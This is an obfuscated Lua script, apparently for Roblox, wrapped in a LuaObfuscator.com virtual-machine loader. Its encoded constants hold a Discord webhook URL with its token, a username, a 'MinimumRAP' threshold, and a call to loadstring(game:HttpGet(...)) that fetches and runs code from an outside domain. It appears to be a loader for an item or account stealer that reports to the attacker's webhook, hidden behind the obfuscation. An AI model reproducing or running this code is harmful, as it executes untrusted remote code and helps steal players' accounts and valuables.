--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=(619 -(555 + 64)) -0 ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (932 -(857 + 74)) ;v31=2 -1 ;end end end v23=nil;function v23() local v33,v34=v1(v16,v19,v19 + (570 -(367 + 201)) );v19=v19 + (929 -(214 + 713)) ;return (v34 * (65 + 191)) + v33 ;end v18=3;end if (v18==4) then function v25() local v35=0 + 0 ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(878 -(282 + 595))) then v38=3 -(440 -(145 + 293)) ;v39=(v21(v37,953 -(802 + 150) ,53 -33 ) * ((1639 -(1523 + (544 -(44 + 386))))^(29 + 3))) + v36 ;v35=2 -0 ;end if ((0 + 0)==v35) then v36=v24();v37=v24();v35=1066 -(68 + 997) ;end if (v35==2) then v40=v21(v37,1291 -(226 + 1044) ,134 -103 );v41=((v21(v37,32)==((1604 -(998 + 488)) -(11 + 21 + 85))) and  -(1188 -(1069 + 118))) or (2 -1) ;v35=6 -3 ;end if (v35==(3 + 0 + (772 -(201 + 571)))) then if (v40==(0 + 0)) then if (v39==(957 -(892 + 65))) then return v41 * (791 -(368 + 423)) ;else v40=2 -1 ;v38=18 -(10 + 8) ;end elseif (v40==(3783 -1736)) then return ((v39==0) and (v41 * ((1 -0)/((1488 -(116 + 1022)) -(87 + 263))))) or (v41 * NaN) ;end return v8(v41,v40-(3266 -2243) ) * (v38 + (v39/((182 -(67 + 113))^((162 -123) + 13)))) ;end end end v26=nil;function v26(v42) local v43;if  not v42 then v42=v24();if (v42==(0 + 0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -(3 -2) );v19=v19 + v42 ;local v44={};for v68=3 -2 , #v43 do v44[v68]=v2(v1(v3(v43,v68,v68)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29() local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if ((3 + 1)==v45) then while true do if (v46~=(104 -(17 + 86))) then else local v96=0;while true do if ((0 + 0)~=v96) then else v49=nil;v50=nil;v96=1;end if (v96~=(397 -(115 + 281))) then else v46=4 -2 ;break;end end end if (v46==(0 -0)) then local v97=0 + 0 ;while true do if (v97==(1 -0)) then v46=3 -2 ;break;end if (v97~=(0 -0)) then else v47=0 -0 ;v48=nil;v97=868 -(550 + 317) ;end end end if (v46==2) then v51=nil;v52=nil;v46=3 -0 ;end if ((3 -0)~=v46) then else v53=nil;while true do local v98=0 -0 ;local v99;while true do if (v98==(65 -(30 + 35))) then v99=0;while true do if (v99==(0 + 0)) then if (v47~=(2 -1)) then else v51={v48,v49,nil,v50};v52=v24();v53={};v47=2;end if (v47==3) then local v146=0 -0 ;while true do if (v146==(1990 -(582 + 1408))) then for v161=3 -2 ,v24() do v49[v161-1 ]=v29();end return v51;end end end v99=1;end if ((1213 -(323 + 889))~=v99) then else if (v47~=(0 -0)) then else local v147=0;local v148;while true do if (v147==(0 -0)) then v148=0;while true do if (v148==(3 -2)) then v50={};v47=321 -(53 + 267) ;break;end if (v148~=0) then else local v165=0 + 0 ;while true do if (v165==1) then v148=414 -(15 + 398) ;break;end if (v165==(1824 -(1195 + 629))) then v48={};v49={};v165=1 -0 ;end end end end break;end end end if (v47~=(984 -(18 + 964))) then else for v150=242 -(187 + 54) ,v52 do local v151=0 -0 ;local v152;local v153;while true do if (v151==(780 -(162 + 618))) then local v163=0 + 0 ;while true do if (v163~=1) then else v151=1 + 0 ;break;end if (v163~=(0 + 0)) then else local v166=0 + 0 ;while true do if (v166~=(126 -(116 + 10))) then else v152=v22();v153=nil;v166=1 + 0 ;end if (v166~=1) then else v163=1 -0 ;break;end end end end end if (v151~=(1 -0)) then else if (v152==(739 -(542 + 196))) then v153=v22()~=0 ;elseif (v152==(3 -1)) then v153=v25();elseif (v152~=(1 + 2)) then else v153=v26();end v53[v150]=v153;break;end end end v51[1639 -(1373 + 263) ]=v22();for v154=1001 -(451 + 549) ,v24() do local v155=0 + 0 ;local v156;local v157;local v158;while true do if (v155~=0) then else v156=0 + 0 ;v157=nil;v155=1 -0 ;end if ((2 -1)~=v155) then else v158=nil;while true do if (v156==(1551 -(1126 + 425))) then local v167=0 -0 ;while true do if (v167==(1384 -(746 + 638))) then v157=0 + 0 ;v158=nil;v167=3 -2 ;end if (v167==(1 -0)) then v156=342 -(218 + 123) ;break;end end end if (v156~=(1582 -(1535 + 46))) then else while true do if (v157~=(0 + 0)) then else v158=v22();if (v21(v158,1 + 0 ,1)~=(560 -(306 + 254))) then else local v168=0 + 0 ;local v169;local v170;local v171;local v172;while true do if (v168==1) then v171=nil;v172=nil;v168=2;end if (v168==(0 -0)) then v169=1467 -(899 + 568) ;v170=nil;v168=978 -(553 + 424) ;end if (v168==(3 -1)) then while true do if ((1 + 0)==v169) then v172={v23(),v23(),nil,nil};if (v170==(0 + 0)) then local v177=0;local v178;while true do if (v177==0) then v178=0 + 0 ;while true do if (v178==0) then v172[3]=v23();v172[8 -4 ]=v23();break;end end break;end end elseif (v170==(573 -(426 + 146))) then v172[1 + 2 ]=v24();elseif (v170==(4 -2)) then v172[1 + 2 ]=v24() -((1458 -(282 + 1174))^(77 -61)) ;elseif (v170==(756 -(239 + 514))) then local v186=811 -(569 + 242) ;local v187;local v188;local v189;while true do if (v186==0) then v187=0 -0 ;v188=nil;v186=1 + 0 ;end if (v186==(1 + 0)) then v189=nil;while true do if ((1024 -(706 + 318))~=v187) then else local v194=0 + 0 ;while true do if ((1251 -(721 + 530))==v194) then v188=0;v189=nil;v194=1272 -(945 + 326) ;end if (v194==(2 -1)) then v187=732 -(476 + 255) ;break;end end end if (v187==1) then while true do if (v188==(0 + 0)) then v189=700 -(271 + 429) ;while true do if (v189~=(0 + 0)) then else v172[5 -2 ]=v24() -((1502 -(1408 + 92))^16) ;v172[7 -3 ]=v23();break;end end break;end end break;end end break;end end end v169=1088 -(461 + 625) ;end if (v169==0) then local v173=1288 -(993 + 295) ;while true do if (v173==(0 + 0)) then local v181=0;while true do if ((0 + 0)~=v181) then else v170=v21(v158,1173 -(418 + 753) ,3 -0 );v171=v21(v158,2 + 2 ,6);v181=337 -(144 + 192) ;end if (v181==(1 + 0)) then v173=217 -(42 + 174) ;break;end end end if (1==v173) then v169=1 + 0 ;break;end end end if (v169==(2 + 0)) then local v174=0 + 0 ;local v175;while true do if (v174==(0 + 0)) then v175=0 + 0 ;while true do if (v175~=(529 -(406 + 123))) then else if (v21(v171,1581 -(1183 + 397) ,1770 -(1749 + 20) )==(1 + 0)) then v172[1324 -(1249 + 73) ]=v53[v172[2 + 0 ]];end if (v21(v171,1977 -(1913 + 62) ,2 + 0 )==(2 -1)) then v172[1936 -(565 + 1368) ]=v53[v172[3]];end v175=1 + 0 ;end if ((1662 -(1477 + 184))~=v175) then else v169=1148 -(466 + 679) ;break;end end break;end end end if (v169==(6 -3)) then if (v21(v171,3 + 0 ,3)==(2 -1)) then v172[1904 -(106 + 1794) ]=v53[v172[860 -(564 + 292) ]];end v48[v154]=v172;break;end end break;end end end break;end end break;end end break;end end end v47=4 -1 ;end break;end end break;end end end break;end end break;end if (v45~=(0 + 0)) then else v46=0 + 0 ;v47=nil;v45=305 -(244 + 60) ;end if (v45==(5 -3)) then v50=nil;v51=nil;v45=7 -4 ;end if (v45==(117 -(4 + 110))) then v52=nil;v53=nil;v45=588 -(57 + 527) ;end if (v45==(1428 -(41 + 1386))) then v48=nil;v49=nil;v45=478 -(41 + 435) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54) if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v84=v2(v0(v54,16));if v20 then local v91=v5(v84,v20);v20=nil;return v91;else return v84;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v55,v56,v57,v58=v1(v16,v19,v19 + (1004 -(938 + 63)) );v19=v19 + 4 ;return (v58 * (12902972 + 3874244)) + (v57 * (66661 -(936 + (1802 -(1565 + 48))))) + (v56 * (85 + 171)) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...) local v70=v62;local v71=v63;local v72=v64;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v85=0,v78 do if (v85>=v72) then v76[v85-v72 ]=v77[v85 + 1 ];else v80[v85]=v77[v85 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=7) then if (v83<=3) then if (v83<=1) then if (v83>0) then do return;end else local v100=v82[2];v80[v100]=v80[v100](v13(v80,v100 + 1 ,v75));end elseif (v83>2) then v80[v82[2]]();else local v102=v82[2];local v103,v104=v73(v80[v102](v13(v80,v102 + 1 ,v82[3])));v75=(v104 + v102) -1 ;local v105=0;for v133=v102,v75 do v105=v105 + 1 ;v80[v133]=v103[v105];end end elseif (v83<=5) then if (v83==4) then local v106=0;local v107;local v108;while true do if (v106==0) then v107=v82[2];v108=v80[v82[3]];v106=1;end if (v106==1) then v80[v107 + 1 ]=v108;v80[v107]=v108[v82[4]];break;end end else v80[v82[2]]();end elseif (v83==6) then local v109=0;local v110;while true do if (v109==0) then v110=v82[2];v80[v110]=v80[v110](v13(v80,v110 + 1 ,v75));break;end end else local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==1) then v75=(v114 + v112) -1 ;v115=0;v111=2;end if (v111==2) then for v144=v112,v75 do local v145=0;while true do if (v145==0) then v115=v115 + 1 ;v80[v144]=v113[v115];break;end end end break;end if (v111==0) then v112=v82[2];v113,v114=v73(v80[v112](v13(v80,v112 + 1 ,v82[3])));v111=1;end end end elseif (v83<=11) then if (v83<=9) then if (v83==8) then local v116=v82[2];local v117=v80[v82[3]];v80[v116 + 1 ]=v117;v80[v116]=v117[v82[4]];else do return;end end elseif (v83==10) then v80[v82[2]]=v61[v82[3]];else v80[v82[2]]=v82[3];end elseif (v83<=13) then if (v83==12) then v61[v82[3]]=v80[v82[2]];else v61[v82[3]]=v80[v82[2]];end elseif (v83>14) then v80[v82[2]]=v82[3];else v80[v82[2]]=v61[v82[3]];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67) if v67 then local v88=0;local v89;while true do if (v88==(0 + 0)) then v89=(v65/((1140 -(782 + 356))^(v66-1)))%((269 -(176 + 91))^(((v67-(3 -2)) -(v66-(2 -1))) + 1)) ;return v89-(v89%(1 -0)) ;end end else local v90=(1094 -(975 + 117))^(v66-(1876 -((1175 -(697 + 321)) + (4679 -2961)))) ;return (((v65%(v90 + v90))>=v90) and (1 + 0)) or (0 -0) ;end end v22=nil;v18=2;end end end return v15("LOL!0B3O0003083O00557365726E616D65030F3O006865726F6272696E655F697374784403093O00557365726E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F312O32383638373932332O30343833373932302F5A4930614F76573964726B6A46716B7A41734154467238785F2D656F4930416F4162784471374631623534584A61666743397178754E78486C32377263724F3855797751030A3O004D696E696D756D524150025O006AF840030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E737061636500103O00120B3O00023O00120D3O00013O00120B3O00023O00120D3O00033O00120B3O00053O00120D3O00043O00120B3O00073O00120D3O00063O00120A3O00083O00120A000100093O00200400010001000A00120B0003000B4O0002000100034O00065O00022O00053O000100012O00013O00017O00",v9(),...);
